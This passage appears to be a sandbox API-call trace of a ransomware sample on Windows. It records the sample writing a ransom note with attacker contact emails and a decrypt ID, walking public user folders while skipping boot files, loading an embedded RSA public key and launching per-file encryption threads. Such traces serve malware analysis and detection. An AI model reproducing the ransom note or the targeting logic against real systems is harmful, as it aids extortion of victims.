number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.857] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.857] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\libraries\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.857] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\libraries\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0141.857] WriteFile (in: hFile=0x868, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0141.858] CloseHandle (hObject=0x868) returned 1 [0141.858] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.858] PathFindFileNameW (pszPath="C:\\Users\\Public\\Libraries") returned="Libraries" [0141.858] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0141.859] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0141.859] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.859] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.859] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.859] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.859] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.859] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0141.859] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0141.859] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0141.859] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0141.859] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0141.859] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0141.859] SetErrorMode (uMode=0x1) returned 0x1 [0141.859] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0141.859] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0141.860] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0141.860] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*" [0141.860] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.860] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music") returned="Music" [0141.860] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0141.860] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.860] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.860] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0141.860] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0141.860] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0141.860] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0141.860] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0141.860] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0141.860] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0141.860] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="Desktop") returned 0x0 [0141.860] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="DESKTOP") returned 0x0 [0141.860] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\") returned 26 [0141.860] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.860] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.861] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\" [0141.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x854 [0141.861] Sleep (dwMilliseconds=0x96) [0142.028] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0142.028] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0142.028] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0142.028] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0142.028] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0142.028] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0142.028] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0142.028] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0142.028] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0142.028] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*" [0142.028] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="Desktop") returned 0x0 [0142.028] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="DESKTOP") returned 0x0 [0142.028] SetErrorMode (uMode=0x1) returned 0x1 [0142.029] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Music\\_HELP_INSTRUCTION.TXT") returned 43 [0142.029] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0142.029] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0142.029] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x86c) returned 0x0 [0142.029] RegQueryValueExW (in: hKey=0x86c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4373cd8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4373cd8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0142.029] RegCloseKey (hKey=0x86c) returned 0x0 [0142.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0142.029] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0142.029] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x86c [0142.029] CloseHandle (hObject=0x86c) returned 1 [0142.030] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0142.030] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music") returned="Music" [0142.030] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0142.030] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0142.030] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0142.030] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0142.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0142.030] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0142.030] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0142.030] lstrcmpW (lpString1="Sample Music", lpString2="..") returned 1 [0142.030] lstrcmpW (lpString1="Sample Music", lpString2=".") returned 1 [0142.030] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0142.030] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0142.030] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0142.030] SetErrorMode (uMode=0x1) returned 0x1 [0142.030] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0142.030] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0142.030] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0142.030] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="C:\\Users\\Public\\Music\\Sample Music\\*.*" [0142.030] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d118d8 [0142.075] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music\\Sample Music") returned="Sample Music" [0142.075] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0142.075] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0142.075] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0142.075] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0142.076] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0142.076] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0142.076] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0142.076] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0142.076] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0142.076] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0142.076] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="Desktop") returned 0x0 [0142.076] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="DESKTOP") returned 0x0 [0142.076] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0142.076] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.076] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0142.076] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x880 [0142.076] WaitForSingleObject (hHandle=0x880, dwMilliseconds=0xffffffff) returned 0x0 [0142.399] Sleep (dwMilliseconds=0x96) [0142.543] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0142.543] lstrcmpW (lpString1="Kalimba.mp3", lpString2="..") returned 1 [0142.543] lstrcmpW (lpString1="Kalimba.mp3", lpString2=".") returned 1 [0142.543] StrStrW (lpFirst="Kalimba.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0142.543] StrStrW (lpFirst="Kalimba.mp3", lpSrch="ntldr") returned 0x0 [0142.543] StrStrW (lpFirst="Kalimba.mp3", lpSrch="NTLDR") returned 0x0 [0142.543] StrStrW (lpFirst="Kalimba.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0142.543] StrStrW (lpFirst="Kalimba.mp3", lpSrch="ntdetect.com") returned 0x0 [0142.543] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="Desktop") returned 0x0 [0142.543] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="DESKTOP") returned 0x0 [0142.543] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0142.543] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.543] lstrcpyW (in: lpString1=0x17be7c, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0142.543] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x888 [0142.543] Sleep (dwMilliseconds=0x96) [0142.699] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0142.699] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="..") returned 1 [0142.699] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".") returned 1 [0142.699] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0142.699] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="ntldr") returned 0x0 [0142.699] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="NTLDR") returned 0x0 [0142.699] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0142.699] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="ntdetect.com") returned 0x0 [0142.699] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="Desktop") returned 0x0 [0142.699] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="DESKTOP") returned 0x0 [0142.699] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0142.699] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.699] lstrcpyW (in: lpString1=0x17be7c, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0142.699] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x878 [0142.700] Sleep (dwMilliseconds=0x96) [0142.856] FindNextFileW (in: hFindFile=0x3d118d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0142.856] lstrcmpW (lpString1="Sleep Away.mp3", lpString2="..") returned 1 [0142.856] lstrcmpW (lpString1="Sleep Away.mp3", lpString2=".") returned 1 [0142.856] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0142.856] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="ntldr") returned 0x0 [0142.856] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="NTLDR") returned 0x0 [0142.856] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0142.856] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="ntdetect.com") returned 0x0 [0142.856] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="Desktop") returned 0x0 [0142.856] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="DESKTOP") returned 0x0 [0142.856] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0142.856] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 